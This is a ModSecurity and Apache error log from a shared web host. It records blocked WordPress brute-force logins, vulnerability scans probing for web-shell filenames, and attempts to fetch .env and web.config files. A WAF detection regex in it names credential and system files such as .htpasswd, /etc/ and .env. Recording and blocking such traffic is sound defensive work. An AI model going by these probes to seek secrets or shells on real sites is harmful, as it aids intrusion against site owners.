[Tue May 26 18:36:26.942839 2026] [security2:error] [pid 1015481:tid 1015542] [remote 216.73.216.30:53337] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at ARGS:filesrc. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "billing.mosykay.com"] [uri "/crm"] [unique_id "ahWa0rQIKfWDMlp2INc9pgABOTw"]
[Tue May 26 18:36:27.303302 2026] [security2:error] [pid 1015481:tid 1015653] [client 45.148.10.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahWa07QIKfWDMlp2INc9qgAAATQ"]
[Tue May 26 18:36:27.393450 2026] [security2:error] [pid 1015481:tid 1015667] [client 66.249.64.168:37088] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "doyecpa.com"] [uri "/index.php"] [unique_id "ahWa0bQIKfWDMlp2INc9ggAAAUI"], referer: https://doyecpa.com/prizes/46021086%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20class=
[Tue May 26 18:36:27.445897 2026] [security2:error] [pid 1015481:tid 1015657] [client 66.249.89.230:51359] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahWa07QIKfWDMlp2INc9rgAAATg"], referer: http://www.bloggertarget.com/
[Tue May 26 18:36:27.707843 2026] [security2:error] [pid 1015481:tid 1015700] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWa07QIKfWDMlp2INc9rQAAAWM"]
[Tue May 26 18:36:27.755306 2026] [security2:error] [pid 1015481:tid 1015686] [client 66.249.89.230:51359] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahWa07QIKfWDMlp2INc9vQAAAVU"], referer: http://www.bloggertarget.com/
[Tue May 26 18:36:27.770452 2026] [security2:error] [pid 1015481:tid 1015715] [client 45.148.10.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahWa07QIKfWDMlp2INc9wQAAAXI"]
[Tue May 26 18:36:28.050345 2026] [security2:error] [pid 1015481:tid 1015736] [client 66.249.89.230:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahWa07QIKfWDMlp2INc9xQAAAYc"], referer: http://www.bloggertarget.com/
[Tue May 26 18:36:28.223698 2026] [security2:error] [pid 1015481:tid 1015711] [client 45.148.10.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahWa1LQIKfWDMlp2INc9zQAAAW4"]
[Tue May 26 18:36:28.483163 2026] [security2:error] [pid 1015481:tid 1015555] [remote 194.163.139.224:57458] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 224.139.163.194.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "tea.canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahWa1LQIKfWDMlp2INc90gABYkk"]
[Tue May 26 18:36:29.058148 2026] [security2:error] [pid 1015481:tid 1015671] [client 45.148.10.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahWa1LQIKfWDMlp2INc96wAAAUY"]
[Tue May 26 18:36:29.833686 2026] [security2:error] [pid 1015481:tid 1015682] [client 45.148.10.5:37456] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahWa1bQIKfWDMlp2INc9_AABUVw"]
[Tue May 26 18:36:29.995184 2026] [security2:error] [pid 1015481:tid 1015684] [client 66.249.89.230:51359] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahWa1bQIKfWDMlp2INc-AAAAAVM"], referer: http://www.bloggertarget.com/
[Tue May 26 18:36:30.316345 2026] [security2:error] [pid 1015481:tid 1015641] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWa1bQIKfWDMlp2INc-AwAAASg"]
[Tue May 26 18:36:30.341589 2026] [security2:error] [pid 1015481:tid 1015624] [client 66.249.89.231:55138] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahWa1rQIKfWDMlp2INc-CAAAARc"], referer: http://www.bloggertarget.com/
[Tue May 26 18:36:31.018014 2026] [security2:error] [pid 1015481:tid 1015572] [remote 54.36.102.244:43532] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 244.102.36.54.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWa1rQIKfWDMlp2INc-EQABNVo"]
[Tue May 26 18:36:31.130413 2026] [security2:error] [pid 1015481:tid 1015632] [client 66.249.89.230:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahWa1rQIKfWDMlp2INc-FwAAAR8"], referer: http://www.bloggertarget.com/
[Tue May 26 18:36:31.215685 2026] [security2:error] [pid 1015481:tid 1015577] [remote 74.7.241.58:38616] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahWa17QIKfWDMlp2INc-IAABRF8"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/www/afstpaul.org/wp-content/plugins/woocommerce/vendor/automattic/jetpack-connection/dist
[Tue May 26 18:36:31.340425 2026] [security2:error] [pid 1015481:tid 1015575] [remote 54.36.102.244:43532] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 244.102.36.54.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWa17QIKfWDMlp2INc-IQABG10"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 18:36:31.580492 2026] [security2:error] [pid 1015481:tid 1015578] [remote 185.71.88.234:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 234.88.71.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWa17QIKfWDMlp2INc-IwABgGA"]
[Tue May 26 18:36:31.580708 2026] [security2:error] [pid 1015481:tid 1015729] [client 185.71.88.234:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWa17QIKfWDMlp2INc-IwABgGA"]
[Tue May 26 18:36:31.953488 2026] [security2:error] [pid 1015481:tid 1015620] [client 47.128.116.75:50218] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "anujtradingco.com"] [uri "/robots.txt"] [unique_id "ahWa17QIKfWDMlp2INc-KgAAARM"]
[Tue May 26 18:36:32.207932 2026] [security2:error] [pid 1015481:tid 1015698] [client 45.148.10.5:37456] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahWa2LQIKfWDMlp2INc-MQABYXM"]
[Tue May 26 18:36:32.845100 2026] [security2:error] [pid 1015481:tid 1015668] [client 45.148.10.5:37456] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahWa2LQIKfWDMlp2INc-QgABQ2g"]
[Tue May 26 18:36:33.184374 2026] [security2:error] [pid 1015481:tid 1015699] [client 57.141.2.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWa2LQIKfWDMlp2INc-QQAAAWI"]
[Tue May 26 18:36:33.200360 2026] [security2:error] [pid 1015481:tid 1015719] [client 45.148.10.5:37456] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahWa2bQIKfWDMlp2INc-SQABdnc"]
[Tue May 26 18:36:33.248793 2026] [security2:error] [pid 1015481:tid 1015588] [remote 194.163.139.224:57458] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 224.139.163.194.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "tea.canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahWa2bQIKfWDMlp2INc-SgABNWo"], referer: https://tea.canopykaapi.com/wp-login.php
[Tue May 26 18:36:33.339562 2026] [security2:error] [pid 1015481:tid 1015692] [client 74.249.212.138:12141] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.dnvexpress.in.onesoft.in"] [uri "/samll.php"] [unique_id "ahWa2bQIKfWDMlp2INc-TgAAAVs"]
[Tue May 26 18:36:33.339714 2026] [security2:error] [pid 1015481:tid 1015692] [client 74.249.212.138:12141] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.dnvexpress.in.onesoft.in"] [uri "/samll.php"] [unique_id "ahWa2bQIKfWDMlp2INc-TgAAAVs"]
[Tue May 26 18:36:33.584414 2026] [security2:error] [pid 1015481:tid 1015590] [remote 45.148.10.5:37456] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "web.config"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/web.config"] [unique_id "ahWa2bQIKfWDMlp2INc-UgABX2w"]
[Tue May 26 18:36:33.765797 2026] [security2:error] [pid 1015481:tid 1015648] [client 66.249.89.230:51359] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahWa2bQIKfWDMlp2INc-VAAAAS8"], referer: http://www.bloggertarget.com/
[Tue May 26 18:36:34.048220 2026] [security2:error] [pid 1015481:tid 1015679] [client 66.249.89.231:55138] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahWa2bQIKfWDMlp2INc-YAAAAU4"], referer: http://www.bloggertarget.com/
[Tue May 26 18:36:34.074266 2026] [security2:error] [pid 1015481:tid 1015643] [client 45.148.10.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahWa2rQIKfWDMlp2INc-YwAAASo"]
[Tue May 26 18:36:34.323438 2026] [security2:error] [pid 1015481:tid 1015709] [client 66.249.89.230:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahWa2rQIKfWDMlp2INc-ZgAAAWw"], referer: http://www.bloggertarget.com/
[Tue May 26 18:36:34.506744 2026] [security2:error] [pid 1015481:tid 1015712] [client 45.148.10.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahWa2rQIKfWDMlp2INc-cAAAAW8"]
[Tue May 26 18:36:34.653418 2026] [log_config:warn] [pid 1007701:tid 1007911] (32)Broken pipe: [client 183.82.0.82:41461] AH00646: Error writing to |/usr/local/cpanel/bin/splitlogs --dir=/etc/apache2/logs/domlogs --main=md-74.webhostbox.net --suffix=-bytes_log, referer: https://webmail.waveit.in/cpsess2559768919/3rdparty/roundcube/?_task=mail&_mbox=INBOX
[Tue May 26 18:36:34.653433 2026] [log_config:warn] [pid 1007701:tid 1007911] (32)Broken pipe: [client 183.82.0.82:41461] AH00646: Error writing to |/usr/local/cpanel/bin/splitlogs --dir=/etc/apache2/logs/domlogs --main=md-74.webhostbox.net --mainout=/etc/apache2/logs/access_log, referer: https://webmail.waveit.in/cpsess2559768919/3rdparty/roundcube/?_task=mail&_mbox=INBOX
[Tue May 26 18:36:34.877120 2026] [security2:error] [pid 1015481:tid 1015689] [client 45.148.10.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahWa2rQIKfWDMlp2INc-dgAAAVg"]
[Tue May 26 18:36:35.205666 2026] [security2:error] [pid 1015481:tid 1015728] [client 45.148.10.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahWa27QIKfWDMlp2INc-ggAAAX8"]
[Tue May 26 18:36:35.513285 2026] [security2:error] [pid 1015481:tid 1015648] [client 45.148.10.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahWa27QIKfWDMlp2INc-iwAAAS8"]
[Tue May 26 18:36:35.870252 2026] [security2:error] [pid 1015481:tid 1015645] [client 45.148.10.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahWa27QIKfWDMlp2INc-lAAAASw"]
[Tue May 26 18:36:35.920604 2026] [security2:error] [pid 1015481:tid 1015732] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWa27QIKfWDMlp2INc-jgAAAYM"]
[Tue May 26 18:36:36.254443 2026] [security2:error] [pid 1015481:tid 1015686] [client 74.249.212.138:17085] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.dnvexpress.in.onesoft.in"] [uri "/ingfo.php"] [unique_id "ahWa3LQIKfWDMlp2INc-mwAAAVU"]
[Tue May 26 18:36:36.254595 2026] [security2:error] [pid 1015481:tid 1015686] [client 74.249.212.138:17085] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.dnvexpress.in.onesoft.in"] [uri "/ingfo.php"] [unique_id "ahWa3LQIKfWDMlp2INc-mwAAAVU"]
[Tue May 26 18:36:36.437214 2026] [security2:error] [pid 1015481:tid 1015693] [client 45.148.10.5:37456] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahWa3LQIKfWDMlp2INc-oQABXAM"]
[Tue May 26 18:36:37.110774 2026] [security2:error] [pid 1015481:tid 1015736] [client 124.43.5.103:57848] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.5.43.124.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWa3bQIKfWDMlp2INc-rgAAAYc"]
[Tue May 26 18:36:37.110894 2026] [security2:error] [pid 1015481:tid 1015736] [client 124.43.5.103:57848] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWa3bQIKfWDMlp2INc-rgAAAYc"]
[Tue May 26 18:36:37.194600 2026] [security2:error] [pid 1015481:tid 1015703] [client 45.148.10.5:37456] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahWa3bQIKfWDMlp2INc-rwABZgQ"]
[Tue May 26 18:36:37.480095 2026] [security2:error] [pid 1015481:tid 1015659] [client 74.249.212.138:1322] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.dnvexpress.in.onesoft.in"] [uri "/c55cdler.php"] [unique_id "ahWa3bQIKfWDMlp2INc-twAAATo"]
[Tue May 26 18:36:37.480191 2026] [security2:error] [pid 1015481:tid 1015659] [client 74.249.212.138:1322] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.dnvexpress.in.onesoft.in"] [uri "/c55cdler.php"] [unique_id "ahWa3bQIKfWDMlp2INc-twAAATo"]
[Tue May 26 18:36:38.095262 2026] [security2:error] [pid 1015481:tid 1015696] [client 74.249.212.138:23057] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.dnvexpress.in.onesoft.in"] [uri "/error_log.php"] [unique_id "ahWa3rQIKfWDMlp2INc-xAAAAV8"]
[Tue May 26 18:36:38.095415 2026] [security2:error] [pid 1015481:tid 1015696] [client 74.249.212.138:23057] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.dnvexpress.in.onesoft.in"] [uri "/error_log.php"] [unique_id "ahWa3rQIKfWDMlp2INc-xAAAAV8"]
[Tue May 26 18:36:38.212948 2026] [security2:error] [pid 1015481:tid 1015649] [client 45.148.10.5:37456] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahWa3rQIKfWDMlp2INc-yAABMAo"]
[Tue May 26 18:36:38.591957 2026] [security2:error] [pid 1015481:tid 1015648] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWa3rQIKfWDMlp2INc-xwAAAS8"]
[Tue May 26 18:36:39.230650 2026] [security2:error] [pid 1015481:tid 1015662] [client 45.148.10.5:37456] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahWa37QIKfWDMlp2INc-1AABPQ8"]
[Tue May 26 18:36:40.100611 2026] [security2:error] [pid 1015481:tid 1015664] [client 45.148.10.5:37456] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahWa4LQIKfWDMlp2INc-6QABPw4"]
[Tue May 26 18:36:40.356559 2026] [security2:error] [pid 1015481:tid 1015504] [remote 91.227.122.219:60750] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 219.122.227.91.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWa4LQIKfWDMlp2INc-7gABURY"]
[Tue May 26 18:36:40.372711 2026] [security2:error] [pid 1015481:tid 1015666] [client 74.249.212.138:20837] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.dnvexpress.in.onesoft.in"] [uri "/xenon1337.php"] [unique_id "ahWa4LQIKfWDMlp2INc-8AAAAUE"]
[Tue May 26 18:36:40.372797 2026] [security2:error] [pid 1015481:tid 1015666] [client 74.249.212.138:20837] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.dnvexpress.in.onesoft.in"] [uri "/xenon1337.php"] [unique_id "ahWa4LQIKfWDMlp2INc-8AAAAUE"]
[Tue May 26 18:36:40.549065 2026] [security2:error] [pid 1015481:tid 1015502] [remote 149.18.50.19:52278] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 19.50.18.149.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWa4LQIKfWDMlp2INc-7wABGBQ"]
[Tue May 26 18:36:40.804224 2026] [security2:error] [pid 1015481:tid 1015677] [client 45.148.10.5:37456] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahWa4LQIKfWDMlp2INc--wABTBo"]
[Tue May 26 18:36:41.347585 2026] [security2:error] [pid 1015481:tid 1015713] [client 74.249.212.138:17046] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.dnvexpress.in.onesoft.in"] [uri "/alfa403.php"] [unique_id "ahWa4bQIKfWDMlp2INc_CAAAAXA"]
[Tue May 26 18:36:41.347716 2026] [security2:error] [pid 1015481:tid 1015713] [client 74.249.212.138:17046] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.dnvexpress.in.onesoft.in"] [uri "/alfa403.php"] [unique_id "ahWa4bQIKfWDMlp2INc_CAAAAXA"]
